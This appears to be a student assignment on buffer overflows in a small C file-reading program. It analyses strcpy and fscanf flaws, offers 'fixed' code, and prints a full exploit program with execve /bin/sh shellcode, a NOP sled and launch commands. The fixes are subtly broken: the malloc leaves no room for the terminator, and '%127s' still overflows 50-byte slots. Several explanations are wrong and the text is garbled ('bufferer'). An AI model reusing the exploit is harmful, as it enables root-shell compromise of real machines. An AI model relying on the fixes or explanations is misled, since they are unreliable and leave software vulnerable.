Computer Security Issues - Assignment Example

Name: Course: Tutor: Date: Computer Security Part 1 1) There are potentially two overflow vulnerabilities present. The bufferer vulnerability results in the use of “strcpy”. As given in the code, arg[1] is copied to the bufferer (filename) which can hold up to 128 bytes of data. However, the strcpy does not provide for checking of overflow as it fails to specify any specific number of characters. The second vulnerability is the fscanf function. The fscanf function reads the formatted output from stream. If the scanned (read) file is larger than the size of bufferer, we have an overflow condition. 2) The use of bound checking can help mitigate against overflow vulnerability. For the vulnerable codes given, we can change the code in order to avoid the vulnerability in the following way; A. Strcpy: IBM1 gave two ways the overflow resulting from strcpy can be mitigated. One of such is the use of strncpy in which case, the section for strcpy will read; strncpy(filename, argv[1], 127); filename[127] = '\0'; In this case, the addition of 127 ensures that the maximum data to be copied is less that the size of the bufferer. A check to avoid overflowing in the bufferer. In the event of the source file being less than the destination size, the ‘\0’ provides for filling the space with zero values. Another way to change the code to avoid vulnerability is by the use of the strcpy but dynamically allocating space when they are needed by calling the strlen() syntax on the source string. filename = (char *)malloc(strlen(argv[1])) strcpy(filename, argv[1]); B. fscanf: vulnerability due to fscanf can be mitigated by means of using a %s placeholders with length specifiers as otherwise (used in the above code) poses a problem of inherently insecure and exploitable for bufferer overflows. Thus, instead of the use of %s, we add a length specifier %127s. The non-vulnerable code can be written below: #include #include #include int main(int argc, char *argv[]) { FILE *fp; char filename[128]; char strings[USHRT_MAX][50]; unsigned short cnt = 0; /*replaces the strcpy(filename, argv[1]); */ strncpy(filename, argv[1], 127); filename[127] = '\0'; fp = fopen (filename, "r"); if (fp == NULL) { perror("Unable to open file: "); return(-1); } /*replaces the "%s" with , */ while (fscanf(fp, "%127s", strings[cnt++] ) != EOF); fclose(fp); return(0); } Alternatively, the following code could be used; #include #include #include int main(int argc, char *argv[]) { FILE *fp; char *filename; char strings[USHRT_MAX][50]; unsigned short cnt = 0; /*replaces the strcpy(filename, argv[1]); */ filename = (char *)malloc(strlen(argv[])); strcpy(filename, argv[1]); fp = fopen (filename, "r"); if (fp == NULL) { perror("Unable to open file: "); return(-1); } /*replaces the "%s", */ while (fscanf(fp, "%127s", strings[cnt++] ) != EOF); fclose(fp); return(0); } 3) One element that is common in all bufferer overflow exploits is the shellcode. It is the attacker’s code which is prompted by exploiting vulnerability in the program. It is typically planted in an input bufferer of a program that is vulnerable and then tricking the program into running the shellcode. The shellcode usually contain commands to launch a shell or a remote program. If the program that is being targeted is a server daemon running as root then the shell will also run as root. Programs running as a root give an attacker an unlimited access to the target machine (Newman 234). The program given has two possible vulnerable parts as discussed. Well-known vulnerability in the strcpy function exists. Since this function as used in the given program doesn’t check the size of the input from argv[], it is possible to overflow the 128 byte size for the bufferer that we have set up. Since bufferer is allocated on the stack, it is right before to the saved frame-pointer followed by the return address. If we write past the end of the return address, we can overwrite the return address. When this is done, the function returns it will jump to the shellcode. With the nop (null instructions) included in the program, the program counter will be advanced to the next instruction, i.e. they are a instructions. This is because the return address is just a guess and the null instructions give a level of freedom in where to jump to. The steps in the progression of this vulnerability are: i) Design a shell code, compile and run to generate the contents of the filename. An eggshell is created on the heap that is a self-contained exploit code. This is then passed to the environment variable, as our command line vulnerable program’s argument.  The eggshell is shown below (adapted from2): /* badcode.c */ #include #include /* default offset is 0 */ #define DEFOFFSET 0 /* program’s bufferer is 128 bytes */ #define DEFBUFFERSIZE 128 /* No-operation instruction */ #define NOP 0x90   /* our shellcode that spawn a root shell */ char hellcode[ ] = "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\x68""//sh" /* pushl $0x68732f2f */ "\x68""/bin" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\x99" /* cdql */ "\xb0\x0b" /* movb $0x0b,%al */ "\xcd\x80" /* int $0x80 */ ;   /* getting the esp, in order to determine the return address */ unsigned long getesp(void) {__asm__("movl %esp, %eax");}   int main(int argc, char *argv[]) { /* declare and initialize some of the variables */ char *buffer, *_ptr; long *addr_ptr, return_address; int i, offset=DEFOFFSET, buffersize=DEFBUFFERSIZE;   /* If 1st argument supplied, it is the bufferer size, else use default */ if(argc>1) buffersize = atoi(argv[1]); /* If 2nd argument is supplied, it is the offset, else use default */ if(argc>2) offset = atoi(argv[2]);   /* using the heap bufferer, for the string construction */ if(!(buffer = malloc(buffersize))) {printf("Memory allocation for bufferer failed lor!\n"); exit (0); }   /* get the return address */ return_address = getesp() - offset;   /* copy the return address into the bufferer, by word size */ for (i=0; i< buffersize; i+=4) *(addr_ptr++) = return_address;   /* copy half of the bufferer with NOP, by byte size */ for (i=0; i < buffersize/2; i++) buffer[i] = NOP;   /* copy the shellcode after the NOPs, by byte */ _ptr = buffer + ((buffersize/2) - (strlen(hellcode)/2)); for (i=0; i < strlen(hellcode); i++) *(_ptr++) = hellcode[i];   /* Terminate the string’s bufferer with NULL */ buffer[buffersize-1] = '\0'; /* Now that we've got the string built */   /* Copy the "EGG=" string into the bufferer, so that we have "EGG=our_string" */ memcpy(buffer, "EGG=", 4); /* Put the bufferer, "EGG=our_string", in the environment variable,  as an input for our vulnerable program*/ putenv(buffer); /* run the root shell, after the overflow */ system("/bin/bash"); return 0; } ii) Next we run the vulnerable program with argument read from the environment variable to get to the root shell. This could be possible using the same code as in the lab section: $ gcc -o exploit badcode.c $./badcode // create the badfile with bufferer size as an argument $./vulnerable // launch the attack by running the vulnerable program # Read More